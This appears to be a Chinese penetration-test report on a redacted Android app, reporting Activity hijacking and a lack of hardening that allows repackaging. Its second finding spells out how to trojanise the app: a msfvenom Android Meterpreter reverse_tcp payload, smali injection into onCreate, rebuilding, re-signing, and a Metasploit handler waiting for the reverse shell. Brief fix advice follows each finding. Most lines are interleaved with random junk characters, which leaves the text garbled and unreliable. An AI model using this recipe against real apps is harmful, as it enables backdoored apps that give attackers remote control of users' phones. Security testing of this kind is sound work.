' ?8 v7 q9 u5 M$ X" R( e! \ 表1-2 测试结果
4 b# o% N8 d$ e# D& w8 H: Z# b' ^: ^2 @8 f
$ ? }1 q1 M) n- \0 A' a, ]. j# {' X
4 H, p& v9 `3 a; k I2 I& k
; O- N$ H! f) l" _$ ~4 m
$ N; c& N% B: d: I$ H/ Q
+ r y) A* j3 r8 O. n+ L, G q% a r- U: [+ H3 @' |
0 A- {; b) D: m6 n* r+ k
- Y% e5 P6 V4 _$ U0 D! Y
# c' R# x: h; {. F, n! y2 O
! b/ i2 X" i, {5 g# |& p" t 2 检测结果 9 K2 A" a% o( K6 F
, X$ s0 K! I4 t# ]8 |
/ X3 n- z8 i* f! {% b, D* k1 y1 j* o8 h' e m
% N- Q2 D+ Q: a0 D F H; I# p2 Y9 z" R' p7 q
2.1 某某某 5 z j/ q- ^& O; c1 k
' n" v+ {" }0 Z
( R1 Z% n$ ?8 D4 `0 s, y5 A# A. I/ S: e6 ]! z# I; @
+ W: ^& p" Q, J, z; F- n x/ S) G& d! v
2.1.1检测目标
$ M7 a3 M; @/ a. v. K/ k* K1 D! A z' d% U$ T' P6 p
: Y1 N( b" D9 \. x9 t
) Q* _& v% p& ^3 v7 X; F9 J# | 8 a3 Q2 u7 N& J& H* Z" u
2 B) \' l1 u5 i# N# e; }0 `
目标地址: 某某某某某某APP
9 ^$ r5 l& h& S B Z2 a4 v$ Y5 V. I- {2 h. f3 ]
O- z- M) s0 U ?4 l9 E
$ K6 m0 F V6 `& N
8 @3 j/ i7 ~. J1 V) M) A" d
- S; W7 o- P' \( _7 E3 Z 2.1.2检测结果
1 Y& A+ e9 A, l% H- g' N
8 `7 } p Z; P% E; |9 F, H
' j* W* a8 v( a% {
2 A' q' n, N* r, ~6 i- I
1 f) i* j: ?; G* A9 D/ v6 n$ D0 m
2 V/ ^" i8 w! W0 f/ L* X 2.1.2.1
; u( c( @7 S2 ~: C I4 I% v. B1 k# Q0 q6 r/ U9 I; o+ I
& L% t# h( x+ ]6 x4 Q7 _9 t% n( p: z3 \5 f
& t- u; {( h. W1 `7 F4 T, K
5 w+ ]7 {! Y7 t6 s7 | 漏洞链接地址:某某某某某某APP
! G. G3 p1 L" B- z1 E ]
5 O% g. h' U8 r# O, g
: T7 S% B! g0 U1 ]% J
- i" u* h4 ]( M% L$ Q8 \& l9 [' C 3 J; a2 L+ k/ W
' F0 G$ N1 ^6 g9 i7 y4 r0 j
$ V3 J7 N' _, c$ t' |
6 _- }2 @/ D# K
8 U! L! w& m1 `' z8 u* y; X' B" e/ F7 w2 Q# I& v- X2 t' X8 l- q" H
' s3 U# Z& A& ^- `* Y5 |" U2 X
5 q# H! G% u2 v T z 漏洞分析及取证: . K8 C4 Q& v$ t: x, D$ G9 k
3 O* R; {" W/ M3 Y0 o& o, a( w7 S
* W9 e5 Y1 u( w0 z7 n3 W Z; h: s; d6 H2 L, m3 Y
- W/ H* W( n2 {+ L# |; O5 {+ {" I4 F: L; l" S
通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: $ H( F' U% z5 O0 I7 d+ v4 R
k# q7 C: C' S) ]0 a9 i- t8 N
3 B8 y H! a. h! M+ @" U2 {$ f6 T/ v* C1 P( y0 h$ x% k1 v! c4 i
* O0 U- H/ r' J4 u o) C6 q
% _3 a6 S* d$ A+ o
$ _. E7 V N/ i, h/ ?) ~ d2 m: Y3 A! V K L1 v6 t5 Q
- H2 U& }2 U: s5 k# w \. P6 Y% @+ s7 l& j
' d, Z, y, H( O! ^* O: ^! a
0 w8 t6 G$ P$ R7 ~# x6 p5 n
- w- A/ T+ G/ y, K
) K$ @& k0 F$ e* e0 }
* C, o( @( x" q* g/ V; d1 ?
7 l$ y# Q. {& {% q, p, N0 x
9 y6 q) H# X1 _; l4 i
: h4 [% J( H/ ~3 H" R; H3 C
1 D* o5 d, K% _$ E: L$ l3 {
2 `5 Y S* ^% u
w+ s, \7 v. [- [, \0 V
7 x& R% x- U, p( d- {* p8 X
3 }5 A; r2 o& j8 t& X0 N0 A2 {4 ?
6 L7 m2 \% [ G, a( \( x
F/ X* b; Y/ P9 F1 B- t- q
Z! o: F6 g0 a0 |, m
. ?- u7 Q. ?0 S. w4 L Q
# S9 j6 Q& U% K9 n7 q# |1 W4 l
+ x: ^' d2 Q0 t) m- ]% p
! ~' g: ^+ e1 E5 }4 L3 c) m' M
1 L+ P$ e0 r" ]6 S
% j& S8 p" a/ r# Z8 U" b: p: s6 Y9 B& K7 r# u: U) H/ J( M
$ ^% i, l6 {! L( p5 S" v0 e& |. D$ u5 z" W) ~5 v
漏洞危害:高
# G% z8 ?2 R/ T7 Q
0 q% k4 ]2 e3 j: q7 S7 T
. x9 }. ]+ w8 h B/ o4 Q# y+ k/ G4 R* v& ^0 t5 d9 v8 x# N
1 o/ z$ e/ A& Y1 [2 Y
9 ~: _1 {3 z% W! V5 M
4 Z0 k/ {% V! X/ i9 j2 }% U9 o0 s: k& V; e' N" k* }9 }! J& E
4 }0 ?* A( r0 I. R4 h3 Z* p, ^
3 ?# Y) ~" \5 r: G. x% J. C: a2 J; P 6 S3 i% P; X6 Y" z, j
7 B. n% ?- ~( f; |7 [7 x |
7 t3 |9 `9 S \$ I( _1 R
6 h/ K( r: C. V# S* q$ l' X9 ` 9 Y' x; \! h8 u8 x8 h# o
, @7 n7 q1 U' ]2 w# O$ w 严重程度
( K* J5 c* F0 t8 d4 Y1 `; o/ O
- @* ? Q. u) E( ~4 v" B! d" i% x
9 _' a3 D1 H% g! R7 K1 |. D6 W+ g& K2 S# M* t1 C
|
; A$ U8 O. F$ z, z P1 j, }/ I* [) |% D( p! W
8 a( L' ?' ] d( Y' j, F8 Y9 s4 g: c% n" K5 I
' I: G, a# |# B& r
2 M- E6 }1 b2 a* {3 I, p 高
4 I* P. x1 y& _) w z& ~- L! F
, H. N6 p- \2 V+ X4 [# O& _ R6 Y
4 \/ ~6 f& z v+ @* @8 d1 a
. M3 Q- Y" [3 a | # O# Q6 I+ k0 P( ^8 Y$ ~
0 G' ?2 R& u0 L, U4 {- v. D
+ Y3 w8 g% A/ H @# y5 n6 y' u9 e( x; Y
& S2 l) c$ |! `4 X
7 {0 z% h. e+ C2 T9 h" ^: _7 `) Q ■
# i$ a) |/ c8 A: s; c; h$ L8 N9 Y1 Z0 k' u
) F; U$ K- w7 a: j$ u
0 T& E' \4 [) \/ n2 a. _" L C | " S; z# o9 Z$ b, b# c" ]! [/ O% }
+ k% K) W" K6 @/ Y 2 J" M; D: l/ V. n
1 S' I: K: D0 N1 [2 J, R R# C 6 M: [8 ?/ G4 @ f. |8 ^
, K: R7 W5 }3 K; e" p/ j
中
2 d8 n, i: ~0 Z; L v
3 H. F! s! I: {# ^# L- ? ( a) Z7 q& } h1 d( l0 |7 w
/ F& ]7 n+ I- o" q8 S& Q
|
! B5 ]6 l( Z1 J# X6 o8 e7 K0 z6 s6 X6 R- j* F' A
6 H" H! P# f( s* d) @$ C
+ n' E" A" c {& m( f
, W7 c9 ~, G' Y( j H& n( a
% K; u/ Y. v4 w* N& {
: m* L: K4 G% |$ K( y/ n6 \
- T4 i: i5 }% K# o9 H1 \
! a; X& b! k# m9 j: z; S* H! c2 A" p& ?8 j* i# }
|
7 X4 x5 o8 c; r: E( m8 s5 W5 u0 K& E, X/ d, ]
& _9 s! @0 \( q8 b9 u) Z
1 D6 T8 O9 [2 S7 ]( ^0 q
8 t& u' H/ {: z9 N; h- `
- H+ N6 c- `3 p+ M' U9 r
低
; h- N3 F/ X0 H
; s+ ]+ b" _ o - Q( e, D9 q" _/ {: o3 S
U1 N. @& I2 z k' L! f
| 9 ] j) ^+ Q0 ?6 v% `9 A3 e
) W5 w t, E/ y. Y
( W6 V! {- ?( y$ r2 G; E* {
0 y0 `2 [, V6 q( U& a$ a' p
+ {0 y# M- `) o/ o- \
- t' `4 q: X. i6 o" f+ n. H3 Z / I) n. ~4 U' f% r+ e4 F5 e
: u. P/ E$ Z$ [- X3 ?
" H/ g, X( r: }
5 X7 P' ~5 D& l9 v/ t; z5 Y/ B, K
|
' T0 F0 Z9 J- g/ m9 T
9 [% C3 Y& U# D0 F& W
. x2 N, x- L8 ~' I# J
% [6 G2 h3 w3 e* ?
" [& n+ k/ ?5 u3 h! C0 T/ D
; j7 z+ }3 O' ?3 S) X, O& Y
: F) N$ \ a i3 X
& V8 w+ e; A" b 2 P+ Y1 D3 j- O$ M; }- s3 a3 C
# X6 ~2 m3 N. c: t* I 3 b+ f# Z( k/ k) P" V$ m, A- Q
2 J S7 U. b0 Q5 j, }4 p
3 n2 M" ^4 X3 A4 c' n# p+ `
$ ^( L# u$ q- q3 h
) d! q7 a/ b3 q2 E3 q( p7 v: _; d- T) \* r& Z* I% D
- i" C- ~$ A6 j a
, a3 v! h: \' ?& O6 T( e- L! v 修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 / e) J; w# _8 j, h# t, z
( g2 R' f' G3 m2 J% R4 @1 e- o
x% Q4 {4 j$ V% R
/ {' N! b( Y" g' s+ D7 s 7 F2 {5 h0 g, @3 \9 ~
0 ~" _, R9 ]9 d
+ l3 m8 n# _% L! C4 N) l) {9 P) _0 v$ x X" l/ Q. X( @
: `0 C( O) S/ [
' i/ l; S9 W) C1 T: w r' Z: U & W0 a9 k s- F" d) G" W8 H- @
) f, m) K" O7 a3 x4 F! n8 {5 ?4 ~ 9 D" g% A% i, n. K' O/ Z9 {7 j, |
" U) ]$ d% N' \9 [; F
! k0 N/ p( {5 P/ K( {( `
$ B1 F( n) J8 L
: ?: s9 ?; K, C4 o
9 }" F3 {2 q y/ k, f% q2 X) R 2.1.2.2
9 p5 ?4 ~2 f9 {* M* {5 R& K' ^2 I# I+ ]
+ k6 g" n i* F/ }% V/ ^. k7 x
6 |$ v3 ^2 p: _$ `$ [) u$ {# i {
% l I& c* b; } 漏洞链接地址:某某某某某某APP ; E5 z `# D% P
1 g' O* P4 j" X; e6 |9 t
8 v( o# A: [ h9 g' f4 r( E
) B) _- D& |5 Z ; X% e+ L+ X! b$ g# ~9 l0 e
+ Q, f: Y! x* x0 Q/ F 漏洞分析及取证: & Z7 u% S% F4 j' h
& f3 Y2 R! o7 ?( S/ j) H
. D" z4 O! T: a" X9 X* b D; Q9 Q/ d# Y: j9 [9 L3 W- b
2 M, S5 d2 b2 l5 b% y! o
8 M$ p, F9 T; F' ` 通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: 7 Y! ^, g3 h- X- o3 } }
8 W' H: A; D# h& O
4 [) J! Y: ]: b: A
- b, E% {$ q1 r6 R9 D, D
* J* l9 O. Q& h/ c" B. R! e5 z( h9 O* C' ?; V/ Z
用Metasploit 生成木马 apk
3 e2 m7 }/ y# @- R
+ Q- A: s' d" `9 y4 e
. U6 Y F; t. I) s/ `# `7 V& H( i3 r4 \% Q5 D+ X% H
1 l& E# n+ a- `; e0 Y& }% |3 z. J1 r" n' P7 x# f1 L
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk
7 ^9 \* w0 p3 P4 \+ _. s
. ~- A7 m. d: L9 p+ T% f
5 X! P0 a& P W: X# U* N9 X h( q3 a$ X* y/ o$ u+ F+ x& H6 k
- }" T2 q& f: e% t7 S7 W
" p( z( S0 j: B; J& F
反编译目标apk和木马apk 9 z6 g. O5 U% y3 c, U z8 m8 G
7 ~9 w' \' t& Z) k
. g: {" `1 |0 {, W5 P
, r8 X+ f/ L' [9 ~* Q l
: ]3 [* ?8 r: ~8 U4 t7 {& t t! L8 p h7 e( t0 D
apktool d target.apk
+ V" _" I5 p: Z' \' L3 [: R7 V4 @, w/ ?$ B7 l' ~, E6 N
apktool d cockhorse.apk
; Y h D4 D: Z- m( J6 Z0 v% e6 z/ g$ T* I& G6 I/ J( A a
- B+ I7 Z% e3 h9 M6 M9 \4 ^" C3 G2 F5 Y/ I0 K' R
7 B4 D6 f5 R& w9 k" _# {( j0 b( V5 Y1 n; X+ u" Y
木马 apk 注入目标 apk 6 P2 K) Y4 K" L% v" X: U; @
2 K* U, E8 I7 J3 v
7 h& m+ m: Z2 l% h9 u
( \5 }7 f6 V" e4 R
$ P( V- ?: r& \/ f4 c' W4 L
( I% X" V7 C& Z& K! [. w* I7 `4 } 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
- _4 \* z& r* z- E; y- y3 m! @
$ N( k# e1 [/ n; W9 H" Y# i invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
% c( x: j9 L( K* f& E
7 D. G2 O- m* A0 n7 ~+ e
0 k2 H' E! J f/ R/ ]! H, R
5 {* q' N# U" ]5 E$ @
( ?4 ~$ x' _" O' Q; ^% {" `0 G
/ Y; s4 L' R( r% ^" K* d
将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 4 |# M( h# k+ _' H. t* m" t" e
% t" |5 S; s, x8 \3 k& ?( ?& D# _
5 N6 [2 }0 C' n- l
% G! J5 w! K/ p6 G
# f4 i# f5 I7 C9 s
5 s) c& ^2 j3 K A 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下 / i% r2 P K6 \
# E" C5 b. d( l8 }6 G
g- i; w; H( P) T0 N; p+ t/ N- ~( i6 R; f! c4 ~
4 b# ~! |6 X0 s5 e
" ?* y. M0 L2 K4 l5 C: W
回编译生成最终 apk & K. W0 B; f- e# G% X
6 e0 v8 f& l) b9 ?- a& t
( |5 x( Z8 E& s! T/ |
* E3 h5 J# \) G- N
7 k2 ?. T8 @5 W# _' p
' Y9 {, A9 {% c4 s* Y* r7 p$ W 重新打包
5 {, N# ~2 y. x- [9 n
E4 s! ]1 c8 ?7 M8 i$ @
; T: E9 n6 [0 T) q0 n8 a# y. b' H1 b
* s8 D% {% ^/ r+ i7 b" X. \/ ^ ! q& @$ d* ~! r. e+ h4 |$ p1 ^0 K! t
2 x( m9 e& v2 c0 a apktool b -o repackage.apk target_app_floder
' y! j- P: Y1 ^5 \" z* `
, ]! ^4 j |7 e
4 J) l, P& G* b( f1 P1 e( t) I
0 N4 e2 M8 u$ F( N2 a* C 8 B# |& @2 v9 z" Y3 ?# [4 }
. Z$ `7 E2 O8 A9 k' B
创建签名文件,有的话可忽略此步骤
9 ^% O) _4 J+ s _, ^* l# C3 l' K3 {+ P* b
1 n! R3 d2 H* c* B* r
* d1 b& u' U$ p3 B' u; l
0 O% w% B1 u: u* K
' X, R' t* O* p keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 / s- d% }: Z O5 M5 e+ E
3 @: E% ?4 c% y" Y/ d
" P' R& v* T6 k6 }0 S
9 ~: J. R3 ~; p0 ^
" J: [# Q: R4 N( n- A" t' M* _: r6 _$ V2 \
签名,以下任选其一 5 {3 s" r6 u$ r0 p: k$ [! \
% F7 p0 v& @5 l3 @, e6 M
3 M7 O$ j- N0 P# j% R2 m: Y7 S8 s
, r, }+ X# n9 I% X, I4 f7 Z& ^+ r
7 C; v8 I6 Q9 m" |5 [) `6 ?- h E: Z/ v3 b. Q& \& W, L q
jarsigner 方式 7 F" L0 t% ]( ?& l. H. _
. j2 H8 ~: ?5 Z5 r3 P
6 {7 f: F- x( g5 c/ ~8 L/ P
+ z0 ]/ s. e! z3 F1 G2 }
% W1 `( g/ I/ a* q- K; b& @% f
4 h% \* ~5 o4 i. y- j3 ?- P" H; X jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname
9 F; K2 ~' N) [+ v6 i7 f9 @2 J
" b* s6 e% @" D) g& P& V
3 @9 [0 @2 L: h, k' X
: n* J, i" s1 u) Q 1 s" F8 x' m" { [
) k% N- ^7 E! _0 J" d
apksigner 方式
^! M3 J& o& P+ T! A) u% u' [! u2 r% q
! A X; R( _3 |( h( [+ L
& z. J8 j0 t1 `% S: i) O
! l' m/ Z! O: {' \2 \9 Y/ b2 l ! e4 Q0 e1 q2 ~# i( O
5 J7 M9 m1 v& F. @; P$ K1 R1 I L
apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 0 D1 r, x- P3 {5 d" ?
* Z+ X% Q8 Q! a$ j6 ?3 {
8 s: k& J+ [5 M* B- q" n3 n" u
& Q9 E$ o: c# y- l2 g7 x4 v: B2 k
2 k& i; y& R- }7 I
/ x# N7 t: j2 h, T c, n 如需要禁用 v2签名 添加选项--v2-signing-enabled false - F! J6 R7 e7 C |
2 S6 j( i9 V* _) G
+ x( ~6 O3 _' F: j+ N5 l
d; e( B, h) F$ Y5 U P
" m/ w: S& [, r$ A4 n
( N# Z, X7 u& v" k: g 验证,以下任选其一 $ m- \. D5 g( g
# L L: i; z2 Q
; S' B0 e! B5 s7 f
* u) L8 z% v* `8 F6 b3 @. y
9 [; |8 u5 n1 t3 ~0 ^
+ N* O$ d/ ~7 x5 p jarsigner方式
1 D2 i Z3 _: v+ B7 y. c3 |0 T9 M+ V& O
4 V1 x" R# l) U
5 W% C& }/ ~! G6 v& q+ P8 z7 m% C3 R" U" o. O* n, {( b) ^
7 t0 g) ^" w1 N
) q8 h' ?& O! M- ]6 W jarsigner -verify repackaged.apk
% ?- V7 m: L. k! a. R O8 E9 V4 a6 q$ S1 j
2 Q7 E9 v# Z0 l+ |9 V
& b7 Z) G8 i2 ~/ A( D" c
q K4 o v( j$ H8 E9 M* G. ]+ ?
apksigner 方式
; S; d, b( h4 c% R/ t8 `- p
3 G7 ]$ a0 \& _, i- S3 k
+ I. A: @7 i7 N; l7 r
1 D0 L* _2 ~$ h, |$ C" G 5 ^& P/ L! g0 h9 }
$ Y; l1 x& c* A! k: v
apksigner verify -v --print-certs repackaged.apk
, n& Q; a3 n/ c/ i! D& {, I2 U! _, k2 t
2 @. P7 ?6 X% x$ n% U* C: S7 T
7 a! a c7 |# f! P/ r3 s
$ m) I7 p% H& ?# n8 Z, l, z0 K6 {# C) Y0 j$ Z4 v2 M
keytool方式
g2 U/ ^, J( J
) G9 A, m, A/ }/ e8 |& H& m
0 k" t; |/ j/ _8 J6 R% P* D
9 Q* z& K8 b1 N7 O; v& P6 S" V
1 M& @% X; x# `8 j7 Q2 J
+ F- N9 B& G0 ?. r% j keytool -printcert -jarfile repackaged.apk
! U5 j, N; l! l" k9 Q& y- x! D A) ?3 v. d& A% p8 V. g: h/ f# b
" E! v. j* J. Y5 p
9 N* Z. Z! H5 ^1 o w. ?2 k
: k6 ^4 _& c5 P9 V: q$ @
, e1 j9 b: N; u1 c6 [# u 对齐 2 c9 e# R) A! n# B4 W0 \
3 I" q" t7 P0 ` Y8 p1 A; A% h. X6 j
3 X/ H$ t3 M! t0 c8 \
. C& u5 E: Q) B: {4 ^, G : J, D0 {* {& x/ b9 e! K
! O9 X# E7 D' S" | 字节对齐优化
. O, g* r5 S6 E8 f$ C4 N( X: n; a2 o. j/ N+ i8 y
, h6 b, H1 t& K0 ?0 o& V3 K
W7 b& u9 V& S/ Z7 r3 o! u X2 e4 j
8 `' t1 S2 F& R/ Q4 _
: X. y" W" g; d$ ?& C: ~: D# Z zipalign -v 4 repackaged.apk final.apk
' u- d7 G' e+ O8 c5 U, A" K d! G* n
' `7 E: ^1 ~$ D z9 G6 Y
8 E7 r1 H, Z+ d& [9 L" m; ^ # c3 ~! q& P1 f/ t5 b/ S
- b& }# L8 r/ A8 _' J; X4 a* j
检查是否对齐
& E. B1 M) [7 r! i' y# y, ]5 p8 P4 D
1 x) |+ v$ N6 T4 g) m- d% P' a$ a
- _# {8 ]2 B# S
- Q; k) N2 W4 f2 {& H: K0 P6 j' g
7 @$ s1 v, u6 b$ s
zipalign -c -v 4 final.apk 9 r1 E2 q5 Q' `& l4 E% L
- h7 F/ g! `0 i0 A2 _
8 t' C: D* X' D3 e
$ q0 H9 z$ C0 _" U: M @% d7 S, q4 c
, m0 A. n' c! @ u' A6 I
& K) v- \1 O# o$ @& H3 ?/ p 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 2 J0 X, ]3 U7 C! M; U
, N4 A$ G3 a5 v# p. y
% J( S0 n7 y& ^/ i" M0 l7 C0 s
- w2 p, `1 n& I5 [
# [2 x6 M4 F/ z8 r3 t% z$ M* I$ i1 ^, r
启动Metasploit控制台,配置参数等待上线
) x3 m% c) ~$ R% L$ ^- @1 A9 [# |* f$ S7 B+ Y4 H
- o" ~+ S' s+ G- Q* y8 u
/ ]. o; }3 G- t" _7 \ ( {, r; b9 I( x1 p
# r4 ~1 Y+ z, S 在终端依次输入如下命令 / {( P. m f4 S9 m
$ ]9 r. U' L2 U& O) ?0 R. r2 l
3 l6 a6 l$ ~5 t& O
2 y1 u$ b4 H+ C" z" `+ j6 G
% M) z+ `3 A8 } s
& L3 q2 i: t2 E1 f$ a msfconsole $ s5 z4 D, h9 B% B1 _. _5 Y, W
9 ?& U6 u/ u+ b
3 D, S, L0 D! Z7 A, u# H) I V
M+ H9 i0 w+ P
5 H4 u. K4 B& i* g' b4 M, r' B5 P% u9 l5 A/ j4 ^
use exploit/multi/handler
1 G! J! o$ C9 ]8 }+ B. l3 p5 M1 @) G9 c0 m' @( C. L1 N n( e
, L L+ x% v! N/ l8 [7 _
1 K, L' S; ~3 d
$ O: X+ v8 L9 N9 R9 m" D
0 ^$ w9 P( [- y' A set PAYLOAD android/meterpreter/reverse_tcp % f% Y0 e' m' d8 n7 _, W! Y& G
. H1 |$ Q" Z0 `6 G. l% O
E( f% S6 J* q7 L, S0 @" @: D2 `6 q B1 P( ?
6 {6 Q+ C/ f" d J: L, A3 o7 Z, k
; w6 E% J+ ]& m$ m5 c+ v6 T$ ^ set LHOST 192.xxx.xx.xx ; g+ D( X, _7 `" N6 A, u
8 U; q; w9 l1 F6 R# y
; a# g9 D) a6 q2 X! f! n% g$ Z) U8 G0 x- F9 D
" m# Q( @ D' a: q6 I0 J
) L J7 }4 B( V9 q' |0 q% W set LPORT 4444 & |; C! O/ p6 k$ \4 n
9 ?$ N4 S# W; H! \+ I, s G
# G* w: H: J, F4 n( W$ \1 C
8 @- D1 U+ r4 Y
- Q) `( y( q1 P7 n' |/ B+ b! P0 H# n% a( t; F
exploit ! u n* B+ F1 Y( n8 x% E
p# [( r% S2 K5 I
' d/ K1 o$ L$ |5 u
$ z5 y7 f0 ~5 [$ n
+ S4 D0 N0 u% {5 K/ V: c+ h2 b. G0 f! [; x: [! O: g" t1 K
之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:
' P B3 F0 `6 K5 D$ W
1 m n: |) l; [, o
+ J2 ], Y3 o( a$ `/ x
+ }0 ~( k- P0 S! w7 Z4 M
( ]5 m8 _# d- t6 z4 {# N! j- `+ n' m( I
漏洞危害:中 9 ?* W; x8 q- ]% N7 J
. \- ]: x/ Z( I: h3 r
( Q3 `9 P+ k9 \+ c
7 b6 H% z/ v! s, W
1 s" d4 `6 H5 T8 P
* o4 c$ {5 _* S0 d
1 n0 ^1 g3 c# F, r8 \. K" R) Z* |1 U x7 `; O6 O7 w0 A$ }8 s
3 J8 l" v) E. z
; Y G0 v& x3 `3 b+ |7 f
1 N: k6 m" {9 w: c, ~, @
5 \# P7 q' [6 s# S' T* N m6 `
* c1 u; R$ W* U6 S
. n& X$ _/ ?3 g6 m |
8 v1 [/ ~- t3 D) y( e! y; ]8 F
. y. g9 a" r7 F1 p" I7 G+ k/ M
+ M5 G: b3 ?% [. M 严重程度 7 e7 z9 x% L: z" z4 D
, @ ~- u# Q2 K/ i
! I. @ N) g o/ c
7 i, U6 u: }- o2 y2 l& U |
! E3 m0 I! b; f8 J; @
3 Q1 S; x$ u7 P" B! V8 }# Q5 l$ K5 g
0 y; q2 z& W& O- H/ J* v+ O$ U$ g# N+ \& e; t
: f3 G4 C* U# h+ ~
4 V+ Q7 ]3 A; `" [0 b; h2 `5 G n( e3 \. k 高
2 a }5 ]5 [" n3 G2 G) K
* t! h* B) G/ X+ b9 Z
! w) `1 L% `: }) T& e! D) j5 `/ X9 G& W
|
3 r- k6 J* i3 H% w0 ?
- _3 B" X f6 m3 G6 U ) D6 f1 u4 o- K1 Q1 D& d; W3 d9 k5 F
}; f) M* i4 ~
8 t% j; T: q+ D% b
: S0 c9 Q$ }, Q
■
$ `, t5 M1 `* V
Y" }2 F% R- ?& a 0 h X) G6 W% H8 m- N, E, m
+ {8 c7 x) n# `1 H& Y, z | 8 e3 G6 F) X8 f1 @
5 x) Q% T0 q: m" J) {0 H& L' v 0 L3 y+ A# j4 N) N0 n
3 x, a f6 S2 X! f E
2 O% W' t ?1 w! ^ q
' M2 }8 z# m% @% l 中 - k J, Y" o# p S4 y
2 J5 o( E! m% L/ Z1 D
6 Z9 C: `* @) a$ M
5 K% G& A: i+ H: y/ d9 o
| 6 ^1 K0 X" K; k# a
) K) P( q: w. t4 T; F, u2 v: J
7 {# l4 H7 l, G5 W: x% L
" E. K0 V: t9 `" D8 ~( r. Z- g 3 |; [) r# F. n. q) O
' b8 {# X# J, ~1 L
# c; F! G# ~4 M8 r; I. z% }) l6 O* [+ v6 p7 w
9 e0 u. ^& A' `% P
0 V c% w6 j% k2 @& S / `2 P' k# a# J
1 d8 D; Y n5 Y/ G% ~8 ]! p
| ' b, G j( S7 n! |3 V/ F
P8 Y& [2 s$ U* f! w' P- Z
" ^0 u- x Y! s+ `. R8 @
/ p" G. r9 x( a( S' X! K
5 |0 x. [/ i( N& F3 Z5 x p# {& ^1 ^7 Y1 T/ F+ c2 d
低 1 V* ]& B' \1 H: {. ]
& z' ~! v% p+ d+ ]
9 {3 P8 Q1 r! \4 G
7 a# A. E4 }7 [% { | * r7 T& Y; S" n& ~. R/ b4 h
8 H* n, w5 J5 y/ f5 n7 t
5 m9 h- Y9 j6 _; T, [
S3 h; M+ W2 w3 b. h
: L+ R9 s# `6 l
. ~7 `- ]& M; P5 E7 \5 L! M2 m" V ! v, A6 j8 N1 h. O& S W7 h0 h
$ z7 {4 {9 }' D+ O p/ O( {- @
: N( m3 o4 D/ X: s, F
2 W6 t- I/ X& g & k. E( u' d+ u1 r2 x7 {$ E& S9 O
( i( P0 g% t- {3 ] | + I }0 n h) f+ _* ?
! K! H% `) z x1 E' f; P: _
( z) q& R# a1 n D$ [& s
9 e$ c" |# c' [! \0 A: V 3 j1 [/ N! p( {! W
6 i* |) o7 ^$ L' \1 X: g
- U$ `9 \; m6 d7 v
7 R5 x! W* ?2 Z$ j m5 ? s+ t; \0 T$ `+ C" F3 m
0 w1 ~8 I( w) y5 P" T: j A 1 O: d5 C5 F. D% J
" `) X: K3 g) j3 g) R5 I
$ f* p S# I3 F$ r% G% H
; {# h8 f* M$ D u' h
H( A2 ~& Q; `; Z" A u* E3 v7 `( B5 b$ @1 Q P# c6 W
0 Y( Q4 P; i) S( r/ S
( a9 a8 h! H+ o: F; h0 K; w6 b2 Y 修复方法:
) _$ k% i! c: O0 k3 h0 B" [9 h$ \0 }$ t
" R4 H- u1 ]+ t0 u/ }
2 r8 c0 Z2 B$ ~$ s! E
; L6 G7 O; Y2 h( u" h. J* n% f9 i9 N" [5 P: |
1.在 APP 启动时应做签名校验防止二次打包。
q. Z2 R) j$ ?( h" Z0 d
. _0 \' s! a8 l+ f 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 * O" O. |7 Z) }7 Z0 P
- N7 @8 }( p$ x7 n7 w( U3 p) ?
# I5 a% B0 b- _! ]8 @
! {8 m0 I9 v; _1 A }- i
2 e0 m/ f0 z- v# s8 r' h0 G) X$ n4 R6 z& U" y, e
s3 B% r# o+ b, G& Z3 T
6 J5 ?6 t0 ~, @
7 H; e7 H/ W' X, O( q
+ Y* F7 c2 ]) \! R2 k/ g3 T
2 Q" ~7 y0 R8 x5 i' N, V" I
2 M, M$ F! j% Z0 O ~' E# X/ z
& D# e3 g' C2 j' X: p3 r% C. n8 ?4 [7 E
, J. `0 a/ W2 j. c1 w, k3 v/ d
. ?. ~, a8 M n+ y
% E7 r5 g' C! W" c4 n* H
& P: Y1 ?7 P8 K9 W4 @, L, v
% _8 P& M! d- X' V3 f t+ h' |
7 B/ _' i t' H w! ]+ i